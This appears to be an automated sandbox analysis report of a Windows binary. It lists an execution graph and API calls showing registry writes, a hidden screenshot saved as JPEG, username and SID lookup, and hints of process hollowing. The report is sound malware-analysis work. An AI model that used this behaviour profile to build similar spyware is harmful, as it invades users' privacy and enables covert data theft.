                                                                                                                                                                                                                                                    execution_graph 26262 69e8d0 GetUserNameA 26263 69e951 26262->26263 26263->26263 26301 6b4170 26263->26301 26265 69e96d 26316 6b6190 26265->26316 26267 69e9d8 26333 6b6530 26267->26333 26269 69e9f2 26270 6b6190 93 API calls 26269->26270 26271 69ea60 26270->26271 26272 6b6530 26 API calls 26271->26272 26273 69ea7a 26272->26273 26342 6b3260 26273->26342 26275 69eaa7 26276 6b6190 93 API calls 26275->26276 26277 69eb10 26276->26277 26278 6b6530 26 API calls 26277->26278 26279 69eb2a 26278->26279 26280 6b6190 93 API calls 26279->26280 26281 69eb98 26280->26281 26282 6b6530 26 API calls 26281->26282 26283 69ebb2 26282->26283 26284 6b6190 93 API calls 26283->26284 26285 69ec20 26284->26285 26286 6b6530 26 API calls 26285->26286 26287 69ec3a CoInitialize 26286->26287 26290 69ec87 26287->26290 26288 69f465 error_info_injector 26358 6b98e0 26288->26358 26290->26288 26291 69f48d 26290->26291 26365 6bef49 26291->26365 26292 69f489 26304 6b418e _Yarn 26301->26304 26306 6b41b4 26301->26306 26302 6b429e 26372 6926a0 26 API calls 2 library calls 26302->26372 26304->26265 26305 6b42a3 26373 6925c0 26 API calls 3 library calls 26305->26373 26306->26302 26308 6b4208 26306->26308 26309 6b422d 26306->26309 26308->26305 26370 6925c0 26 API calls 3 library calls 26308->26370 26314 6b4219 _Yarn 26309->26314 26371 6925c0 26 API calls 3 library calls 26309->26371 26310 6b42a8 error_info_injector 26310->26265 26313 6bef49 25 API calls 26313->26302 26314->26313 26315 6b4280 error_info_injector 26314->26315 26315->26265 26318 6b61ab 26316->26318 26331 6b6264 _Yarn error_info_injector 26316->26331 26317 6b6303 26375 6926a0 26 API calls 2 library calls 26317->26375 26318->26317 26326 6b6219 _Yarn 26318->26326 26318->26331 26374 6b5600 26 API calls std::_Facet_Register 26318->26374 26320 6b6308 26321 6b63af 26320->26321 26322 6b634e 26320->26322 26378 6932b0 26 API calls 2 library calls 26321->26378 26376 693a60 91 API calls __Mtx_unlock 26322->26376 26329 6bef49 25 API calls 26326->26329 26326->26331 26327 6b63b4 26328 6b6353 26377 6b63c0 EnterCriticalSection LeaveCriticalSection __Cnd_destroy_in_situ __Mtx_destroy_in_situ 26328->26377 26329->26317 26331->26267 26332 6b6385 error_info_injector 26332->26267 26334 6b6690 26333->26334 26341 6b6570 _Yarn error_info_injector 26333->26341 26334->26269 26335 6b66a4 26380 6926a0 26 API calls 2 library calls 26335->26380 26337 6b66a9 26339 6bef49 25 API calls 26337->26339 26340 6b66ae error_info_injector 26339->26340 26340->26269 26341->26334 26341->26335 26341->26337 26379 6b5600 26 API calls std::_Facet_Register 26341->26379 26343 6b328b 26342->26343 26344 6b3292 26343->26344 26345 6b32c5 26343->26345 26346 6b32e4 26343->26346 26344->26275 26347 6b331a 26345->26347 26348 6b32cc 26345->26348 26353 6b32d9 _Yarn 26346->26353 26382 6925c0 26 API calls 3 library calls 26346->26382 26383 6925c0 26 API calls 3 library calls 26347->26383 26381 6925c0 26 API calls 3 library calls 26348->26381 26352 6b32d2 26352->26353 26354 6bef49 25 API calls 26352->26354 26353->26275 26355 6b3324 26354->26355 26384 69ddc0 68 API calls std::ios_base::_Ios_base_dtor 26355->26384 26357 6b333e error_info_injector 26357->26275 26359 6b98e9 IsProcessorFeaturePresent 26358->26359 26360 6b98e8 26358->26360 26362 6b9b15 26359->26362 26360->26292 26385 6b9ad8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26362->26385 26364 6b9bf8 26364->26292 26386 6beed5 25 API calls 3 library calls 26365->26386 26367 6bef58 26387 6bef66 11 API calls std::locale::_Setgloballocale 26367->26387 26369 6bef65 26370->26314 26371->26314 26372->26305 26373->26310 26374->26326 26375->26320 26376->26328 26377->26332 26378->26327 26379->26341 26380->26337 26381->26352 26382->26353 26383->26352 26384->26357 26385->26364 26386->26367 26387->26369 26388 6ba055 26389 6ba061 CallCatchBlock 26388->26389 26414 6b9d7b 26389->26414 26391 6ba068 26392 6ba1c1 26391->26392 26401 6ba092 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 26391->26401 26437 6ba3c5 4 API calls 2 library calls 26392->26437 26394 6ba1c8 26438 6bde7e 26394->26438 26398 6ba1d6 26399 6ba0b1 26400 6ba132 26422 6c423b 26400->26422 26401->26399 26401->26400 26436 6bde58 37 API calls 4 library calls 26401->26436 26404 6ba138 26426 6b0cd0 26404->26426 26415 6b9d84 26414->26415 26442 6ba5af IsProcessorFeaturePresent 26415->26442 26417 6b9d90 26443 6bc699 10 API calls 2 library calls 26417->26443 26419 6b9d95 26420 6b9d99 26419->26420 26444 6bc6b8 7 API calls 2 library calls 26419->26444 26420->26391 26423 6c4249 26422->26423 26424 6c4244 26422->26424 26423->26404 26445 6c3d96 49 API calls 26424->26445 26427 6b0cdb 26426->26427 26446 6a1600 26427->26446 26429 6b0ce5 26430 6a1dd0 119 API calls 26429->26430 26431 6b0cea 26430->26431 26432 6af3d0 125 API calls 26431->26432 26433 6b0cef 26432->26433 26434 6b0ca0 CreateThread 26433->26434 26435 6b0cc0 Sleep 26434->26435 26435->26435 26436->26400 26437->26394 26663 6bdd1c 26438->26663 26441 6bde42 23 API calls std::locale::_Setgloballocale 26441->26398 26442->26417 26443->26419 26444->26420 26445->26423 26447 6b3260 69 API calls 26446->26447 26448 6a1652 26447->26448 26451 6961f0 26448->26451 26450 6a165d 26614 695da0 26451->26614 26457 69630f 26460 6bef49 25 API calls 26457->26460 26458 6962e9 error_info_injector 26459 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26458->26459 26462 69630b 26459->26462 26463 696314 __fread_nolock 26460->26463 26461 69625f error_info_injector 26461->26457 26461->26458 26462->26450 26464 696377 RegOpenKeyExA 26463->26464 26465 6963d0 RegCloseKey 26464->26465 26466 6963a6 RegQueryValueExA 26464->26466 26467 696400 26465->26467 26466->26465 26467->26467 26468 6b4170 26 API calls 26467->26468 26471 696418 error_info_injector 26468->26471 26469 696480 error_info_injector 26472 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26469->26472 26470 6964a7 26474 6bef49 25 API calls 26470->26474 26471->26469 26471->26470 26473 6964a3 26472->26473 26473->26450 26475 6964ac RegOpenKeyExA 26474->26475 26477 6964ed RegSetValueExA 26475->26477 26478 696517 RegCloseKey 26475->26478 26477->26478 26480 696528 error_info_injector 26478->26480 26479 6965e6 26483 6bef49 25 API calls 26479->26483 26480->26479 26481 6965ce error_info_injector 26480->26481 26482 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26481->26482 26484 6965e2 26482->26484 26485 6965eb 26483->26485 26484->26450 26629 6c1ab7 40 API calls 26485->26629 26487 69661c RegOpenKeyExA 26488 696665 RegCloseKey 26487->26488 26489 696646 RegSetValueExA 26487->26489 26490 696676 error_info_injector 26488->26490 26489->26488 26491 696734 26490->26491 26492 69671c error_info_injector 26490->26492 26494 6bef49 25 API calls 26491->26494 26493 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26492->26493 26495 696730 26493->26495 26496 696739 __wsopen_s 26494->26496 26495->26450 26497 6b3260 69 API calls 26496->26497 26498 6967a0 26497->26498 26499 6961f0 73 API calls 26498->26499 26500 6967ab RegOpenKeyExA 26499->26500 26503 6967d9 __fread_nolock error_info_injector 26500->26503 26502 696d64 26505 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26502->26505 26503->26502 26504 696d80 26503->26504 26506 696829 RegQueryInfoKeyW 26503->26506 26508 6bef49 25 API calls 26504->26508 26507 696d7c 26505->26507 26509 696d58 RegCloseKey 26506->26509 26510 6968a8 26506->26510 26507->26450 26511 696d85 GdiplusStartup 26508->26511 26509->26502 26510->26509 26512 6968b2 RegEnumValueA 26510->26512 26513 696e39 26511->26513 26522 696e13 26511->26522 26591 6968ee error_info_injector 26512->26591 26514 696e45 26513->26514 26515 697534 26513->26515 26630 6b5600 26 API calls std::_Facet_Register 26514->26630 26649 6926a0 26 API calls 2 library calls 26515->26649 26517 697539 26520 6bef49 25 API calls 26517->26520 26519 6b4170 26 API calls 26519->26591 26524 697552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 26520->26524 26521 696f60 GetDC 26523 6b3260 69 API calls 26521->26523 26522->26521 26522->26522 26525 696f8b 26523->26525 26527 6b3260 69 API calls 26524->26527 26528 6961f0 73 API calls 26525->26528 26530 697626 26527->26530 26531 696f96 26528->26531 26529 6b3260 69 API calls 26529->26591 26532 6961f0 73 API calls 26530->26532 26533 6b3260 69 API calls 26531->26533 26534 697631 26532->26534 26535 696fb3 26533->26535 26650 692400 44 API calls 26534->26650 26536 6961f0 73 API calls 26535->26536 26538 696fba 26536->26538 26539 6b3260 69 API calls 26538->26539 26540 696fcf 26539->26540 26541 6961f0 73 API calls 26540->26541 26544 696fd6 26541->26544 26542 6978c3 26546 6bef49 25 API calls 26542->26546 26543 697649 error_info_injector 26543->26542 26545 6b3260 69 API calls 26543->26545 26549 6b3260 69 API calls 26544->26549 26548 6976b2 26545->26548 26547 6978c8 26546->26547 26550 6bef49 25 API calls 26547->26550 26551 6961f0 73 API calls 26548->26551 26552 697002 26549->26552 26553 6978cd 26550->26553 26554 6976bd 26551->26554 26555 6961f0 73 API calls 26552->26555 26556 6bef49 25 API calls 26553->26556 26651 692400 44 API calls 26554->26651 26557 69700d 26555->26557 26558 6978d2 26556->26558 26631 6b5660 26557->26631 26561 697024 26563 6b5660 26 API calls 26561->26563 26562 69771a GetSidSubAuthorityCount 26564 6977d2 26562->26564 26585 697734 error_info_injector 26562->26585 26575 69703b error_info_injector 26563->26575 26568 6b4170 26 API calls 26564->26568 26565 6976d7 error_info_injector 26565->26547 26565->26562 26566 697740 GetSidSubAuthority 26567 6b3260 69 API calls 26566->26567 26567->26585 26569 697822 26568->26569 26571 6b4170 26 API calls 26569->26571 26570 6961f0 73 API calls 26570->26585 26574 69786f 26571->26574 26572 69715f error_info_injector 26573 6b3260 69 API calls 26572->26573 26576 69719f 26573->26576 26574->26553 26577 69789b error_info_injector 26574->26577 26575->26517 26575->26572 26579 6961f0 73 API calls 26576->26579 26580 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26577->26580 26581 6971aa 26579->26581 26582 6978bf 26580->26582 26583 6971b3 26581->26583 26584 6971b5 RegGetValueA 26581->26584 26582->26450 26583->26584 26586 6971e5 error_info_injector 26584->26586 26585->26542 26585->26564 26585->26566 26585->26570 26652 692400 44 API calls 26585->26652 26587 69722f GetSystemMetrics 26586->26587 26588 697226 GetSystemMetrics 26586->26588 26590 697234 26587->26590 26589 69722d 26588->26589 26588->26590 26589->26587 26592 6b3260 69 API calls 26590->26592 26591->26504 26591->26509 26591->26512 26591->26519 26591->26529 26593 6961f0 73 API calls 26591->26593 26594 69724f 26592->26594 26593->26591 26595 6961f0 73 API calls 26594->26595 26596 69725a RegGetValueA 26595->26596 26604 69728f error_info_injector 26596->26604 26598 6972ca GetSystemMetrics 26600 6972d8 6 API calls 26598->26600 26601 6972d1 26598->26601 26599 6972d3 GetSystemMetrics 26599->26600 26602 6973f8 6 API calls 26600->26602 26603 69736b ___std_exception_copy 26600->26603 26601->26599 26605 69744f error_info_injector 26602->26605 26603->26602 26607 697380 GdipGetImageEncoders 26603->26607 26604->26598 26604->26599 26606 6974e0 GdiplusShutdown 26605->26606 26608 6974f1 error_info_injector 26606->26608 26613 697394 26607->26613 26609 6b98e0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 26608->26609 26610 697530 26609->26610 26610->26450 26612 6973ef 26612->26602 26648 6c1d71 14 API calls _free 26613->26648 26653 6b4030 26 API calls 3 library calls 26614->26653 26616 695dd1 26617 696060 26616->26617 26654 6b4030 26 API calls 3 library calls 26617->26654 26619 6961c6 26622 6951a0 26619->26622 26621 696095 26621->26619 26655 6c02e0 40 API calls 2 library calls 26621->26655 26623 695432 26622->26623 26624 695204 26622->26624 26623->26461 26626 695355 26624->26626 26656 6c02e0 40 API calls 2 library calls 26624->26656 26657 6b5140 26 API calls 3 library calls 26624->26657 26626->26623 26658 6b5140 26 API calls 3 library calls 26626->26658 26629->26487 26630->26522 26632 6b56a3 26631->26632 26633 6b5830 26632->26633 26634 6b5770 26632->26634 26642 6b56a8 _Yarn 26632->26642 26661 6926a0 26 API calls 2 library calls 26633->26661 26637 6b57cb 26634->26637 26638 6b57a5 26634->26638 26636 6b5835 26662 6925c0 26 API calls 3 library calls 26636->26662 26647 6b57bd _Yarn 26637->26647 26660 6925c0 26 API calls 3 library calls 26637->26660 26638->26636 26640 6b57b0 26638->26640 26659 6925c0 26 API calls 3 library calls 26640->26659 26641 6b57b6 26645 6bef49 25 API calls 26641->26645 26641->26647 26642->26561 26646 6b583f 26645->26646 26647->26561 26648->26612 26649->26517 26650->26543 26651->26565 26652->26585 26653->26616 26654->26621 26655->26621 26656->26624 26657->26624 26658->26626 26659->26641 26660->26647 26661->26636 26662->26641 26664 6bdd2a 26663->26664 26665 6bdd3c 26663->26665 26691 6ba4e5 GetModuleHandleW 26664->26691 26675 6bdbc3 26665->26675 26668 6bdd2f 26668->26665 26692 6bddc2 GetModuleHandleExW 26668->26692 26670 6ba1ce 26670->26441 26674 6bdd7f 26676 6bdbcf CallCatchBlock 26675->26676 26698 6c2610 EnterCriticalSection 26676->26698 26678 6bdbd9 26699 6bdc2f 26678->26699 26680 6bdbe6 26703 6bdc04 26680->26703 26683 6bdd80 26708 6c6212 GetPEB 26683->26708 26686 6bddaf 26689 6bddc2 std::locale::_Setgloballocale 3 API calls 26686->26689 26687 6bdd8f GetPEB 26687->26686 26688 6bdd9f GetCurrentProcess TerminateProcess 26687->26688 26688->26686 26690 6bddb7 ExitProcess 26689->26690 26691->26668 26693 6bdde1 GetProcAddress 26692->26693 26694 6bde04 26692->26694 26695 6bddf6 26693->26695 26696 6bde0a FreeLibrary 26694->26696 26697 6bdd3b 26694->26697 26695->26694 26696->26697 26697->26665 26698->26678 26700 6bdc3b CallCatchBlock 26699->26700 26702 6bdc9c std::locale::_Setgloballocale 26700->26702 26706 6c4523 14 API calls std::locale::_Setgloballocale 26700->26706 26702->26680 26707 6c2658 LeaveCriticalSection 26703->26707 26705 6bdbf2 26705->26670 26705->26683 26706->26702 26707->26705 26709 6c622c 26708->26709 26710 6bdd8a 26708->26710 26712 6c86ef 5 API calls std::_Lockit::_Lockit 26709->26712 26710->26686 26710->26687 26712->26710 26713 6c72d2 26718 6c70a8 26713->26718 26716 6c7311 26719 6c70c7 26718->26719 26720 6c70da 26719->26720 26728 6c70ef 26719->26728 26738 6c1182 14 API calls _free 26720->26738 26722 6c70df 26739 6bef39 25 API calls __wsopen_s 26722->26739 26724 6c70ea 26724->26716 26735 6d399f 26724->26735 26726 6c72c0 26744 6bef39 25 API calls __wsopen_s 26726->26744 26733 6c720f 26728->26733 26740 6d322e 37 API calls 2 library calls 26728->26740 26730 6c725f 26730->26733 26741 6d322e 37 API calls 2 library calls 26730->26741 26732 6c727d 26732->26733 26742 6d322e 37 API calls 2 library calls 26732->26742 26733->26724 26743 6c1182 14 API calls _free 26733->26743 26745 6d3364 26735->26745 26738->26722 26739->26724 26740->26730 26741->26732 26742->26733 26743->26726 26744->26724 26748 6d3370 CallCatchBlock 26745->26748 26746 6d3377 26765 6c1182 14 API calls _free 26746->26765 26748->26746 26750 6d33a2 26748->26750 26749 6d337c 26766 6bef39 25 API calls __wsopen_s 26749->26766 26756 6d3931 26750->26756 26755 6d3386 26755->26716 26768 6be839 26756->26768 26761 6d3967 26763 6d33c6 26761->26763 26822 6c80d6 14 API calls _free 26761->26822 26767 6d33f9 LeaveCriticalSection __wsopen_s 26763->26767 26765->26749 26766->26755 26767->26755 26823 6be117 26768->26823 26772 6be85d 26773 6be81c 26772->26773 26835 6be76a 26773->26835 26776 6d39bf 26777 6d39dc 26776->26777 26778 6d3a0a 26777->26778 26779 6d39f1 26777->26779 26860 6ca285 26778->26860 26874 6c116f 14 API calls _free 26779->26874 26783 6d39f6 26875 6c1182 14 API calls _free 26783->26875 26784 6d3a2f 26873 6d3678 CreateFileW 26784->26873 26785 6d3a18 26876 6c116f 14 API calls _free 26785->26876 26789 6d3a1d 26877 6c1182 14 API calls _free 26789->26877 26791 6d3ae5 GetFileType 26792 6d3b37 26791->26792 26793 6d3af0 GetLastError 26791->26793 26882 6ca1d0 15 API calls 3 library calls 26792->26882 26880 6c114c 14 API calls 2 library calls 26793->26880 26794 6d3aba GetLastError 26879 6c114c 14 API calls 2 library calls 26794->26879 26797 6d3a68 26797->26791 26797->26794 26878 6d3678 CreateFileW 26797->26878 26798 6d3afe CloseHandle 26798->26783 26802 6d3b27 26798->26802 26801 6d3aad 26801->26791 26801->26794 26881 6c1182 14 API calls _free 26802->26881 26803 6d3b58 26805 6d3ba4 26803->26805 26883 6d3887 71 API calls 4 library calls 26803->26883 26810 6d3bab 26805->26810 26885 6d3425 71 API calls 4 library calls 26805->26885 26806 6d3b2c 26806->26783 26809 6d3bd9 26809->26810 26811 6d3be7 26809->26811 26884 6c8229 28 API calls 2 library calls 26810->26884 26812 6d3a03 26811->26812 26814 6d3c63 CloseHandle 26811->26814 26812->26761 26886 6d3678 CreateFileW 26814->26886 26816 6d3c8e 26817 6d3c98 GetLastError 26816->26817 26821 6d3bb2 26816->26821 26887 6c114c 14 API calls 2 library calls 26817->26887 26819 6d3ca4 26888 6ca398 15 API calls 3 library calls 26819->26888 26821->26812 26822->26763 26824 6be137 26823->26824 26830 6be12e 26823->26830 26824->26830 26832 6c6cf0 37 API calls 2 library calls 26824->26832 26826 6be157 26833 6c7516 37 API calls __Getctype 26826->26833 26828 6be16d 26834 6c7543 37 API calls __fassign 26828->26834 26830->26772 26831 6c872f 5 API calls std::_Lockit::_Lockit 26830->26831 26831->26772 26832->26826 26833->26828 26834->26830 26836 6be778 26835->26836 26837 6be792 26835->26837 26853 6be878 14 API calls _free 26836->26853 26839 6be799 26837->26839 26840 6be7b8 26837->26840 26844 6be782 26839->26844 26854 6be892 15 API calls __wsopen_s 26839->26854 26855 6c8353 MultiByteToWideChar 26840->26855 26843 6be7c7 26845 6be7ce GetLastError 26843->26845 26847 6be7f4 26843->26847 26858 6be892 15 API calls __wsopen_s 26843->26858 26844->26761 26844->26776 26856 6c114c 14 API calls 2 library calls 26845->26856 26847->26844 26859 6c8353 MultiByteToWideChar 26847->26859 26848 6be7da 26857 6c1182 14 API calls _free 26848->26857 26852 6be80b 26852->26844 26852->26845 26853->26844 26854->26844 26855->26843 26856->26848 26857->26844 26858->26847 26859->26852 26861 6ca291 CallCatchBlock 26860->26861 26889 6c2610 EnterCriticalSection 26861->26889 26863 6ca298 26865 6ca2bd 26863->26865 26869 6ca32c EnterCriticalSection 26863->26869 26871 6ca2df 26863->26871 26893 6ca05f 15 API calls 2 library calls 26865->26893 26868 6ca2c2 26868->26871 26894 6ca1ad EnterCriticalSection 26868->26894 26870 6ca339 LeaveCriticalSection 26869->26870 26869->26871 26870->26863 26890 6ca38f 26871->26890 26873->26797 26874->26783 26875->26812 26876->26789 26877->26783 26878->26801 26879->26783 26880->26798 26881->26806 26882->26803 26883->26805 26884->26821 26885->26809 26886->26816 26887->26819 26888->26821 26889->26863 26895 6c2658 LeaveCriticalSection 26890->26895 26892 6ca2ff 26892->26784 26892->26785 26893->26868 26894->26871 26895->26892

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 006961F0 Relevance: 84.0, APIs: 40, Strings: 7, Instructions: 1737registrywindowfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,495BF602,495BF602), ref: 0069639C
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(495BF602,?,00000000,00000000,?,00000400,?,?,00000000,00000001,495BF602,495BF602), ref: 006963CA
                                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(495BF602,?,?,00000000,00000001,495BF602,495BF602), ref: 006963D6
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 006964E3
                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00696511
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 0069651A
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0069663C
                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0069665F
                                                                                                                                                                                                                                                      • Part of subcall function 006961F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 006967BD
                                                                                                                                                                                                                                                      • Part of subcall function 006961F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00696894
                                                                                                                                                                                                                                                      • Part of subcall function 006961F0: RegEnumValueA.ADVAPI32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 006968E0
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002), ref: 00696668
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00696D5E
                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000,495BF602,00000000), ref: 00696DEA
                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00696F62
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006971CD
                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00697226
                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0069722F
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00697277
                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 006972CA
                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 006972D3
                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 006972DF
                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 006972F4
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00697304
                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0069732A
                                                                                                                                                                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0069733E
                                                                                                                                                                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0069735A
                                                                                                                                                                                                                                                    • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00697387
                                                                                                                                                                                                                                                    • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0069740E
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0069741B
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00697428
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00697430
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0069743A
                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 00697441
                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 006974E3
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 006975BA
                                                                                                                                                                                                                                                    • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00697600
                                                                                                                                                                                                                                                    • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0069760D
                                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00697721
                                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00697748
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                                                                                                                                                                                                    • String ID: $($NtUnmapViewOfSection$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                                                                                                                                                                    • API String ID: 1729688432-36074161
                                                                                                                                                                                                                                                    • Opcode ID: f2eba04a89f5fbe9c63d0540f084ca7c5ddd1c42ae62433b06a37f9a68f8f079
                                                                                                                                                                                                                                                    • Instruction ID: 146f2df9aff6093f4c8f4b0c2fdbd321886c345efc7ca6659450be13fda46b78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2eba04a89f5fbe9c63d0540f084ca7c5ddd1c42ae62433b06a37f9a68f8f079
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4D2F371A102189BDF18DF68CC85BEDBB7AEF45300F508298F509AB691DB359AC4CF94
                                                                                                                                                                                                                                                    Function 006BDD80 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 741 6bdd80-6bdd8d call 6c6212 744 6bddaf-6bddbb call 6bddc2 ExitProcess 741->744 745 6bdd8f-6bdd9d GetPEB 741->745 745->744 746 6bdd9f-6bdda9 GetCurrentProcess TerminateProcess 745->746 746->744
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,006BDD7F,?,?,?,?,?,006BEFF2), ref: 006BDDA2
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,006BDD7F,?,?,?,?,?,006BEFF2), ref: 006BDDA9
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 006BDDBB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: 10994704dc7103da2f015433fd955f1e9b2126b2fa9f1d700593d9f3353829b2
                                                                                                                                                                                                                                                    • Instruction ID: a134012cc797f0f3d9fe2de04180d6a42f37982a1bdc32f3f88fc02441d0c8da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10994704dc7103da2f015433fd955f1e9b2126b2fa9f1d700593d9f3353829b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E0B671011248AFCF517B68DC49A9C3B6BEF41341B048418FA45CE231DB35DED2EB54
                                                                                                                                                                                                                                                    Function 006D39BF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
